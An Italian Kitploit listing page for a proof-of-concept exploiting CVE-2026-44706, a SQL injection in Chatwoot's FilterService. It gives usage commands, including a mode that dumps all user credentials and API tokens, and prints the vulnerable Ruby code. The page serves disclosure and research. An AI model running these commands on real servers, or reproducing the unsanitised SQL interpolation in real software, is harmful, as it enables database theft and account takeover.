Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-44706 — SQL injection in FilterService di Chatwoot | Kitploit
Strumenti/GitHubGitHub/hakaioffsec/cve-2026-44706
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingAutenticazioneApprendimento e FormazioneSicurezza dei Database
GitHubhakaioffsec/cve-2026-44706

CVE-2026-44706

SQL injection in FilterService di Chatwoot

Vedi Repository
62 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

SQL Injection in Chatwoot FilterService

Una proof-of-concept per CVE-2026-44706, una vulnerabilità di SQL Injection nel FilterService#lt_gt_filter_values di Chatwoot che permette a qualsiasi agente autenticato di leggere l'intero database PostgreSQL, incluse le credenziali utente e i token API. Leggi l'articolo completo qui.

Utilizzo:

root@kitploit:~
# Verifica dell'iniezione (basata su booleani)
$ python3 poc.py --url http://TARGET --token TOKEN --account-id 1 --mode check

# Conferma basata sul tempo
$ python3 poc.py --url http://TARGET --token TOKEN --account-id 1 --mode timebased

# Estrazione del risultato di una query SQL arbitraria
$ python3 poc.py --url http://TARGET --token TOKEN --account-id 1 --mode extract --query "SELECT version()"

# Scarica tutte le credenziali utente e i token API
$ python3 poc.py --url http://TARGET --token TOKEN --account-id 1 --mode creds

Versioni Vulnerabili

  • Chatwoot ≤ 4.11.1

Causa Principale

In app/services/filter_service.rb (riga 91), l'input utente viene interpolato direttamente nel SQL senza parametrizzazione:

root@kitploit:~
def lt_gt_filter_values(query_hash)
  value = query_hash['values'][0]          # ← input utente, nessuna sanitizzazione
  operator = query_hash['filter_operator'] == 'is_less_than' ? '<' : '>'
  "#{operator} '#{value}'::#{attribute_data_type}"   # ← interpolazione grezza
end

Ogni altro operatore nella classe utilizza parametri bind (:value_N). Solo is_greater_than e is_less_than sono vulnerabili.

Endpoint Interessati

  • POST /api/v1/accounts/:id/conversations/filter
  • POST /api/v1/accounts/:id/contacts/filter

Impatto

CWE-89 SQL Injection. Qualsiasi agente/amministratore autenticato può:

  • Leggere l'intero database — utenti, messaggi, token, dati cross-account
  • Rubare credenziali — hash bcrypt per cracking offline
  • Rubare token API — impersonare qualsiasi utente, inclusi i SuperAdmin
  • DoS — pg_sleep() per esaurire le connessioni al database

CVSS

8.8 Alto CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Disclaimer

Questo strumento è destinato esclusivamente a scopi educativi e di ricerca. Utilizzalo solo su sistemi di tua proprietà o per i quali hai ricevuto esplicita autorizzazione a testare. L'autore non è responsabile per qualsiasi uso improprio o danno causato da questo programma.

QuimeraX Intelligence

QuimeraX Intelligence è una piattaforma avanzata di EASM e Cyber Threat Intelligence specializzata nell'identificazione di vulnerabilità critiche in sistemi complessi. La piattaforma monitora, rileva e avvisa proattivamente i clienti sulle minacce alla sicurezza, garantendo trasparenza e una risposta rapida ai potenziali rischi. I clienti ricevono notifiche immediate e report completi se i loro sistemi risultano vulnerabili, consentendo loro di adottare azioni protettive. scopri di più

Hakai Security

Hakai Security è un'azienda di cybersecurity fondata da professionisti della sicurezza, impegnata nell'eccellenza tecnica. Offriamo soluzioni di sicurezza su misura, tra cui penetration test avanzati, simulazioni realistiche di Red Team e pratiche di sviluppo sicuro per proteggere proattivamente gli asset dei nostri clienti dalle minacce informatiche in evoluzione.

Hacking Club

Hacking Club è la piattaforma di formazione dove impari la cybersecurity attraverso lezioni pratiche, laboratori e sfide create da esperti che lavorano nella nostra società di consulenza sulla sicurezza: direttamente dal campo di battaglia alla tua formazione. Metti in pratica la vulnerabilità presentata in questo repository con hacking club! scopri di più

Scarica lo strumento